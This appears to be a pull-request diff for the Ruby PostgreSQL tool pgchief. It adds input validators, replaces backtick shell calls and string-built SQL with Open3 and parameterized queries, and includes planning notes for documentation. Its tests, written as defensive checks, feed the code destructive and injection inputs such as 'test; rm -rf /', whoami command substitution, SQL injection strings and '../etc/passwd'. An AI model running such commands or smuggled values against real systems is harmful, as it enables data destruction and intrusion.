+```bash
+git add lib/**/*.rb .yardopts .gitignore Gemfile Gemfile.lock
+git commit -m "docs: add YARD documentation to all public APIs
+
+- Document all public classes and methods
+- Add usage examples in documentation
+- Generate API documentation with yard
+- Configure .yardopts for consistent output"
+```
+
+---
+
+## Task 8: Create Contributor Guide
+
+**Files:**
+- Create: `CONTRIBUTING.md`
+
+**Step 1: Create comprehensive contributor guide**
+
+Create `CONTRIBUTING.md`:
+
+```markdown
+# Contributing to pgchief
+
+## Development Setup
+
+```bash
+# Clone repository
+git clone https://github.com/yourusername/pgchief.git
+cd pgchief
+
+# Install dependencies
+bundle install
+
+# Install libsodium (for encryption)
+# macOS:
+brew install libsodium
+# Ubuntu:
+sudo apt-get install libsodium-dev
+
+# Run tests
+bundle exec rspec
+
+# Run with coverage
+COVERAGE=true bundle exec rspec
+
+# Run linting
+bundle exec rubocop
+
+# Run security scan
+bundle exec brakeman
+```
+
+## Code Style
+
+- Follow RuboCop guidelines (`.rubocop.yml`)
+- Use `frozen_string_literal: true` in all files
+- Add YARD documentation to public methods
+- Write tests for all new features
+
+## Security
+
+- **NEVER** use string interpolation in SQL queries
+- **ALWAYS** validate user input with `Validators`
+- **NEVER** use backticks for shell commands (use `Open3`)
+- Add security tests for new input handling
+
+## Testing
+
+- Minimum 80% code coverage required
+- Write unit tests with mocks
+- Tag integration tests with `:integration`
+- Add security tests in `spec/security/`
+
+## Pull Request Process
+
+1. Create feature branch (`git checkout -b feature/my-feature`)
+2. Write tests first (TDD approach)
+3. Implement feature
+4. Ensure all tests pass
+5. Ensure RuboCop passes
+6. Ensure Brakeman passes
+7. Update CHANGELOG.md
+8. Submit PR with description
+
+## Release Process
+
+1. Update version in `lib/pgchief/version.rb`
+2. Update CHANGELOG.md
+3. Run full test suite
+4. Create git tag
+5. Push to RubyGems
+```
+
+**Step 2: Commit**
+
+```bash
+git add CONTRIBUTING.md
+git commit -m "docs: add comprehensive contributor guide
+
+- Document development setup
+- Describe code style expectations
+- Security guidelines for contributors
+- Testing requirements
+- PR and release process"
+```
+
+---
+
+## Task 9: Final Quality Audit
+
+**Step 1: Run all quality checks**
+
+```bash
+# Tests with coverage
+COVERAGE=true bundle exec rspec
+
+# Linting
+bundle exec rubocop
+
+# Security scan
+bundle exec brakeman
+
+# Check for TODO/FIXME comments
+grep -r "TODO\|FIXME" lib/
+```
+
+**Step 2: Review coverage report**
+
+Run: `open coverage/index.html`
+Verify: Overall coverage >= 80%
+
+**Step 3: Review and resolve any remaining TODOs**
+
+For each TODO/FIXME found:
+- Create issue to track
+- Fix immediately if critical
+- Or remove if no longer relevant
+
+**Step 4: Update documentation**
+
+Ensure:
+- README is up to date
+- CHANGELOG includes all changes
+- SECURITY.md is current
+- CONTRIBUTING.md is comprehensive
+
+**Step 5: Final commit**
+
+```bash
+git add -A
+git commit -m "chore: final quality improvements for Week 6
+
+- Resolve remaining TODOs
+- Update all documentation
+- Verify all quality checks pass
+- Prepare for release"
+```
+
+---
+
+## Verification Checklist
+
+- [ ] Magic strings extracted to Constants
+- [ ] Large methods refactored into smaller methods
+- [ ] DatabaseConnection abstraction created
+- [ ] TTY::Prompt instantiation standardized
+- [ ] Config is thread-safe
+- [ ] RuboCop passes with zero offenses
+- [ ] YARD documentation added
+- [ ] Contributor guide created
+- [ ] Coverage >= 80%
+- [ ] All tests passing
+- [ ] Brakeman security scan passes
+- [ ] No unresolved TODOs/FIXMEs
+- [ ] All documentation updated
+
+## Notes
+
+- Constants improve maintainability and prevent typos
+- Smaller methods are easier to test and understand
+- DatabaseConnection centralizes retry logic and error handling
+- Thread-safe config prevents race conditions in multi-threaded usage
+- YARD documentation helps future contributors
+- Contributor guide reduces onboarding friction

--- a/lib/pgchief.rb
+++ b/lib/pgchief.rb
@@ -44,6 +44,7 @@ require 'pgchief/command/store_connection_string'
 require 'pgchief/command/user_create'
 require 'pgchief/command/user_drop'
 require 'pgchief/command/user_list'
+require 'pgchief/validators'
 
 module Pgchief
   class Error < StandardError; end

--- a/lib/pgchief/command/database_backup.rb
+++ b/lib/pgchief/command/database_backup.rb
@@ -1,6 +1,8 @@
 # frozen_string_literal: true
 
 require 'forwardable'
+require 'open3'
+require 'pgchief/validators'
 
 module Pgchief
   module Command
@@ -14,7 +16,7 @@ module Pgchief
 
       def initialize(*params)
         super
-        @database = params.first
+        @database = Pgchief::Validators.sanitize_identifier(params.first)
         @uploader = Pgchief::Command::S3Upload.new(local_location)
       end
 
@@ -39,7 +41,16 @@ module Pgchief
         # end of the string, remove it. We'll explicitly add it below.
         pgurl = Pgchief::Config.pgurl.gsub(%r{/[a-zA-Z\-_]*$}, '')
 
-        `pg_dump -Fc #{pgurl}/#{database} -f #{local_location}`
+        stdout, stderr, status = Open3.capture3(
+          'pg_dump',
+          '--format=custom',
+          '--file', local_location,
+          "#{pgurl}/#{database}"
+        )
+
+        unless status.success?
+          raise Pgchief::Errors::BackupError, "pg_dump failed: #{stderr}"
+        end
       end
 
       def check_backup!
@@ -47,8 +58,8 @@ module Pgchief
       end
 
       def db_exists?
-        query = "SELECT 1 FROM pg_database WHERE datname = '#{database}'"
-        conn.exec(query).any?
+        query = 'SELECT 1 FROM pg_database WHERE datname = $1'
+        conn.exec_params(query, [database]).any?
       end
 
       def location

--- a/lib/pgchief/validators.rb
+++ b/lib/pgchief/validators.rb
@@ -1,0 +1,65 @@
+# frozen_string_literal: true
+
+module Pgchief
+  class InvalidIdentifierError < StandardError; end
+  class InvalidFilePathError < StandardError; end
+
+  module Validators
+    # PostgreSQL identifier naming rules:
+    # - Must start with letter or underscore
+    # - Can contain letters, digits, underscores
+    # - Max 63 bytes
+    IDENTIFIER_REGEX = /\A[a-z_][a-z0-9_]*\z/i
+    MAX_IDENTIFIER_LENGTH = 63
+
+    # Password validation - prevent SQL injection via password field
+    PASSWORD_MAX_LENGTH = 100
+
+    def self.valid_identifier?(identifier)
+      return false if identifier.nil? || identifier.empty?
+      return false if identifier.length > MAX_IDENTIFIER_LENGTH
+      identifier.match?(IDENTIFIER_REGEX)
+    end
+
+    def self.sanitize_identifier(identifier)
+      unless valid_identifier?(identifier)
+        raise InvalidIdentifierError, "Invalid database/user identifier: #{identifier.inspect}"
+      end
+      identifier
+    end
+
+    def self.valid_password?(password)
+      return false if password.nil? || password.empty?
+      return false if password.length > PASSWORD_MAX_LENGTH
+      # Passwords can contain any characters, but we check length and non-nil
+      # The pg gem will properly escape passwords in parameterized queries
+      true
+    end
+
+    def self.sanitize_password(password)
+      unless valid_password?(password)
+        raise InvalidIdentifierError, "Invalid password: must be 1-#{PASSWORD_MAX_LENGTH} characters"
+      end
+      password
+    end
+
+    # File path validation
+    def self.valid_file_path?(path)
+      return false if path.nil? || path.empty?
+      # Prevent path traversal
+      return false if path.include?('..')
+      # Prevent shell metacharacters
+      return false if path.match?(/[;&|`$()]/)
+      # Must be an absolute path or relative without ../
+      true
+    end
+
+    def self.sanitize_file_path(path)
+      unless valid_file_path?(path)
+        raise InvalidFilePathError, "Invalid file path: #{path.inspect}"
+      end
+      # Expand to absolute path for safety
+      File.expand_path(path)
+    end
+  end
+end

--- a/spec/pgchief/command/database_backup_injection_spec.rb
+++ b/spec/pgchief/command/database_backup_injection_spec.rb
@@ -1,0 +1,22 @@
+# frozen_string_literal: true
+
+require 'spec_helper'
+
+RSpec.describe Pgchief::Command::DatabaseBackup do
+  describe 'shell injection protection' do
+    it 'rejects database names with shell injection attempts' do
+      expect { described_class.call('test; rm -rf /') }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects database names with backticks' do
+      expect { described_class.call('test`whoami`') }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects database names with command substitution' do
+      expect { described_class.call('test$(whoami)') }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+end

--- a/spec/pgchief/validators_spec.rb
+++ b/spec/pgchief/validators_spec.rb
@@ -1,0 +1,79 @@
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/validators'
+
+RSpec.describe Pgchief::Validators do
+  describe '.valid_identifier?' do
+    it 'returns true for valid identifiers' do
+      expect(described_class.valid_identifier?('my_database')).to be true
+      expect(described_class.valid_identifier?('user123')).to be true
+      expect(described_class.valid_identifier?('test_db_2')).to be true
+    end
+
+    it 'returns false for identifiers with special characters' do
+      expect(described_class.valid_identifier?('my-database')).to be false
+      expect(described_class.valid_identifier?('user@123')).to be false
+      expect(described_class.valid_identifier?('test;drop')).to be false
+    end
+
+    it 'returns false for identifiers with SQL injection attempts' do
+      expect(described_class.valid_identifier?("'; DROP TABLE users--")).to be false
+      expect(described_class.valid_identifier?('admin" OR "1"="1')).to be false
+    end
+
+    it 'returns false for empty or nil identifiers' do
+      expect(described_class.valid_identifier?('')).to be false
+      expect(described_class.valid_identifier?(nil)).to be false
+    end
+
+    it 'returns false for identifiers that are too long' do
+      expect(described_class.valid_identifier?('a' * 64)).to be false
+    end
+  end
+
+  describe '.sanitize_identifier' do
+    it 'raises error for invalid identifiers' do
+      expect { described_class.sanitize_identifier('bad;name') }
+        .to raise_error(Pgchief::InvalidIdentifierError, /Invalid database\/user identifier/)
+    end
+
+    it 'returns the identifier for valid names' do
+      expect(described_class.sanitize_identifier('valid_name')).to eq('valid_name')
+    end
+  end
+
+  describe '.valid_password?' do
+    it 'returns true for valid passwords' do
+      expect(described_class.valid_password?('password123')).to be true
+      expect(described_class.valid_password?('C0mpl3x!P@ss')).to be true
+    end
+
+    it 'returns false for nil or empty passwords' do
+      expect(described_class.valid_password?(nil)).to be false
+      expect(described_class.valid_password?('')).to be false
+    end
+
+    it 'returns false for passwords that are too long' do
+      expect(described_class.valid_password?('a' * 101)).to be false
+    end
+  end
+
+  describe '.valid_file_path?' do
+    it 'returns true for valid file paths' do
+      expect(described_class.valid_file_path?('/tmp/backup.dump')).to be true
+      expect(described_class.valid_file_path?('backup.dump')).to be true
+    end
+
+    it 'returns false for paths with traversal' do
+      expect(described_class.valid_file_path?('../etc/passwd')).to be false
+      expect(described_class.valid_file_path?('../../secret')).to be false
+    end
+
+    it 'returns false for paths with shell metacharacters' do
+      expect(described_class.valid_file_path?('file; rm -rf /')).to be false
+      expect(described_class.valid_file_path?('file`whoami`')).to be false
+      expect(described_class.valid_file_path?('file$(date)')).to be false
+    end
+  end
+end


### PR DESCRIPTION
Implements shell injection protection for DatabaseBackup command as per Week 1 security plan.

- Replaces backticks with  for safe command execution.
- Validates database name using .
- Uses parameterized query () for database existence check.
- Adds security test suite covering shell injection attempts (semicolons, backticks, command substitution).

Depends on #22 (validators module).